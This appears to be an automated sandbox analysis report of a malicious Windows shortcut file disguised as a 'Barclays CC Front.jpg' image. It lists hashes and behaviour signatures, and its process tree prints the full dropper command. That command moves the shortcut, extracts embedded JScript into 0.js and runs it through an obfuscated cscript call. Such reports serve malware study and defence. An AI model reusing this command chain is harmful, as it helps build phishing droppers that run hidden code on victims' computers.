Analysis
-
max time kernel
149s -
max time network
168s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
04-02-2022 08:24
Static task
static1
Behavioral task
behavioral1
Sample
bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028.lnk
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028.lnk
Resource
win10v2004-en-20220113
General
-
Target
bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028.lnk
-
Size
83KB
-
MD5
42a0e13c97e0aa0867f769b71e378d24
-
SHA1
c7575dccc6d1a228393e9ac0840a4c10bb4c1fb2
-
SHA256
bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028
-
SHA512
8106fb31144357c1e3ef61c74157ab60e5f81515d6c831347da09aae68c38fcb2cb58ae74758af1f4db32e590abf123c430821d86016191bedcdf579fbc59f0b
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1592 wrote to memory of 1804 1592 cmd.exe 28 PID 1592 wrote to memory of 1804 1592 cmd.exe 28 PID 1592 wrote to memory of 1804 1592 cmd.exe 28 PID 1804 wrote to memory of 1136 1804 cmd.exe 29 PID 1804 wrote to memory of 1136 1804 cmd.exe 29 PID 1804 wrote to memory of 1136 1804 cmd.exe 29 PID 1804 wrote to memory of 1792 1804 cmd.exe 30 PID 1804 wrote to memory of 1792 1804 cmd.exe 30 PID 1804 wrote to memory of 1792 1804 cmd.exe 30 PID 1804 wrote to memory of 1840 1804 cmd.exe 31 PID 1804 wrote to memory of 1840 1804 cmd.exe 31 PID 1804 wrote to memory of 1840 1804 cmd.exe 31 PID 1804 wrote to memory of 1848 1804 cmd.exe 32 PID 1804 wrote to memory of 1848 1804 cmd.exe 32 PID 1804 wrote to memory of 1848 1804 cmd.exe 32 PID 1804 wrote to memory of 1824 1804 cmd.exe 33 PID 1804 wrote to memory of 1824 1804 cmd.exe 33 PID 1804 wrote to memory of 1824 1804 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Barclays CC Front.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\system32\forfiles.exeforfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"3⤵PID:1136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""3⤵PID:1792
-
-
C:\Windows\system32\find.exefind "RDE3"3⤵PID:1840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" rd a"3⤵PID:1848
-
-
C:\Windows\system32\cscript.execScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"3⤵PID:1824
-
-